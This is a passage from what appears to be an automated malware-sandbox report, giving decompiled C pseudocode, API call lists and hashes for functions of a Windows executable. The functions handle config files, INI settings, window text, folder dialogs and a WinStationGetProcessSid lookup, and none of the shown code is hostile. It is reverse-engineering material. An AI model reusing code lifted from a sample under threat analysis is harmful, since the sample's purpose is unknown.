				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}













                                                                                      0x004034f0
                                                                                      0x004034f8
                                                                                      0x00403506
                                                                                      0x00403516
                                                                                      0x0040351c
                                                                                      0x00403531
                                                                                      0x00403537
                                                                                      0x00403545
                                                                                      0x0040354a
                                                                                      0x00403556
                                                                                      0x00403567
                                                                                      0x00403575
                                                                                      0x00403583
                                                                                      0x00403583
                                                                                      0x00403586
                                                                                      0x00403592
                                                                                      0x00403598
                                                                                      0x004035ac

                                                                                      APIs
                                                                                        • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                        • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                        • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                        • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                        • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                      • memset.MSVCRT ref: 00403537
                                                                                      • _ultow.MSVCRT ref: 00403575
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ??2@$memset$_ultow
                                                                                      • String ID: cf@$q
                                                                                      • API String ID: 3448780718-2693627795
                                                                                      • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                      • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                      • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                      • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 83%
                                                                                      			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				return E00402FC6(_t29, _t36,  &_v532);
			}










                                                                                      0x00402f3a
                                                                                      0x00402f51
                                                                                      0x00402f60
                                                                                      0x00402f6f
                                                                                      0x00402f78
                                                                                      0x00402f7a
                                                                                      0x00402f7a
                                                                                      0x00402f8a
                                                                                      0x00402f8f
                                                                                      0x00402f94
                                                                                      0x00402f99
                                                                                      0x00402f9e
                                                                                      0x00402f9f
                                                                                      0x00402fad
                                                                                      0x00402fb2
                                                                                      0x00402fb2
                                                                                      0x00402fc5

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00402F51
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                      • wcsrchr.MSVCRT ref: 00402F6F
                                                                                      • wcscat.MSVCRT ref: 00402F8A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                      • String ID: .cfg
                                                                                      • API String ID: 776488737-3410578098
                                                                                      • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                      • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                      • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                      • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 64%
                                                                                      			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}











                                                                                      0x00407e2d
                                                                                      0x00407e46
                                                                                      0x00407e48
                                                                                      0x00407e4d
                                                                                      0x00407e5f
                                                                                      0x00407e6b
                                                                                      0x00407e6f
                                                                                      0x00407e75
                                                                                      0x00407e7c
                                                                                      0x00407e7d
                                                                                      0x00407e88
                                                                                      0x00407e8d
                                                                                      0x00407e8e
                                                                                      0x00407eaa

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00407E48
                                                                                      • memset.MSVCRT ref: 00407E5F
                                                                                        • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                        • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                      • _snwprintf.MSVCRT ref: 00407E8E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                      • String ID: </%s>
                                                                                      • API String ID: 3400436232-259020660
                                                                                      • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                      • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                      • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                      • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 77%
                                                                                      			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}









                                                                                      0x00405e0a
                                                                                      0x00405e12
                                                                                      0x00405e18
                                                                                      0x00405e1c
                                                                                      0x00405e1e
                                                                                      0x00405e1e
                                                                                      0x00405e24
                                                                                      0x00405e2c
                                                                                      0x00405e2e
                                                                                      0x00405e44
                                                                                      0x00405e49
                                                                                      0x00405e4c
                                                                                      0x00405e4d
                                                                                      0x00405e68
                                                                                      0x00405e74
                                                                                      0x00405e74
                                                                                      0x00000000
                                                                                      0x00405e84
                                                                                      0x00405e8c

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ChildEnumTextWindowWindowsmemset
                                                                                      • String ID: caption
                                                                                      • API String ID: 1523050162-4135340389
                                                                                      • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                      • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                      • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                      • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}






                                                                                      0x00409a4a
                                                                                      0x00409a4f
                                                                                      0x00409a56
                                                                                      0x00409a5e
                                                                                      0x00409a60
                                                                                      0x00409a6e
                                                                                      0x00409a6e
                                                                                      0x00409a60
                                                                                      0x00409a71
                                                                                      0x00409a76
                                                                                      0x00000000
                                                                                      0x00409a78
                                                                                      0x00000000
                                                                                      0x00409a89

                                                                                      APIs
                                                                                        • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                      • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                      • API String ID: 946536540-379566740
                                                                                      • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                      • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                      • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                      • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 93%
                                                                                      			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                      0x0040588e
                                                                                      0x0040588f
                                                                                      0x0040588f
                                                                                      0x00405892
                                                                                      0x00405896
                                                                                      0x004058a9
                                                                                      0x004058a9
                                                                                      0x004058ad
                                                                                      0x004058af
                                                                                      0x004058b5
                                                                                      0x004058b6
                                                                                      0x004058b9
                                                                                      0x004058c2
                                                                                      0x004058c3
                                                                                      0x004058c8
                                                                                      0x004058d2
                                                                                      0x004058d4
                                                                                      0x004058d9
                                                                                      0x004058e0
                                                                                      0x004058ea
                                                                                      0x004058ec
                                                                                      0x004058ed
                                                                                      0x004058f2
                                                                                      0x004058f9
                                                                                      0x00405902
                                                                                      0x00405898
                                                                                      0x00405898
                                                                                      0x0040589a
                                                                                      0x0040589c
                                                                                      0x004058a1
                                                                                      0x004058a2
                                                                                      0x004058a5
                                                                                      0x004058a7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004058a7
                                                                                      0x00405912
                                                                                      0x00405915
                                                                                      0x0040591e
                                                                                      0x0040591e
                                                                                      0x00405907
                                                                                      0x0040590b

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                      • String ID:
                                                                                      • API String ID: 1865533344-0
                                                                                      • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                      • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                      • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                      • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 35%
                                                                                      			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20);
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}










                                                                                      0x00409ddc
                                                                                      0x00409de4
                                                                                      0x00409df0
                                                                                      0x00409df5
                                                                                      0x00409df6
                                                                                      0x00409e03
                                                                                      0x00409e05
                                                                                      0x00409e06
                                                                                      0x00409e3b
                                                                                      0x00409e5d
                                                                                      0x00409e6a
                                                                                      0x00409e73
                                                                                      0x00409e75
                                                                                      0x00409e08
                                                                                      0x00409e08
                                                                                      0x00409e19
                                                                                      0x00409e37
                                                                                      0x00409e37
                                                                                      0x00409e81

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00409E08
                                                                                        • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                        • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                      • memset.MSVCRT ref: 00409E3B
                                                                                      • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                      • String ID:
                                                                                      • API String ID: 1127616056-0
                                                                                      • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                      • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                      • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                      • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 37%
                                                                                      			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                                                      0x0040ad06
                                                                                      0x0040ad0a
                                                                                      0x0040ad0c
                                                                                      0x0040ad14
                                                                                      0x0040ad19
                                                                                      0x0040ad1f
                                                                                      0x0040ad23
                                                                                      0x0040ad27
                                                                                      0x0040ad2a
                                                                                      0x0040ad2d
                                                                                      0x0040ad34
                                                                                      0x0040ad3b
                                                                                      0x0040ad3e
                                                                                      0x0040ad44
                                                                                      0x0040ad48
                                                                                      0x0040ad4a
                                                                                      0x0040ad52
                                                                                      0x0040ad5a
                                                                                      0x0040ad64
                                                                                      0x0040ad65
                                                                                      0x0040ad6b
                                                                                      0x0040ad6c
                                                                                      0x0040ad73
                                                                                      0x0040ad76
                                                                                      0x0040ad7c
                                                                                      0x0040ad7c
                                                                                      0x0040ad7f
                                                                                      0x0040ad84

                                                                                      APIs
                                                                                      • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                      • wcscpy.MSVCRT ref: 0040AD65
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                      • String ID:
                                                                                      • API String ID: 3917621476-0
                                                                                      • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                      • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                      • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                      • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}








                                                                                      0x00404a62
                                                                                      0x00404a6a
                                                                                      0x00404a6e
                                                                                      0x00404a71
                                                                                      0x00404a74
                                                                                      0x00404a92
                                                                                      0x00404a92
                                                                                      0x00404a76
                                                                                      0x00404a76
                                                                                      0x00404a87
                                                                                      0x00404a90
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404a90
                                                                                      0x00404aa3
                                                                                      0x00404aa7
                                                                                      0x00404aa7
                                                                                      0x00404a94
                                                                                      0x00404a98

                                                                                      APIs
                                                                                      • GetDlgItem.USER32 ref: 00404A52
                                                                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Item
                                                                                      • String ID:
                                                                                      • API String ID: 3888421826-0
                                                                                      • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                      • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                      • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                      • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 93%
                                                                                      			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}






                                                                                      0x004072e0
                                                                                      0x004072f7
                                                                                      0x004072fd
                                                                                      0x00407316
                                                                                      0x00407342

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004072FD
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                      • strlen.MSVCRT ref: 00407328
                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
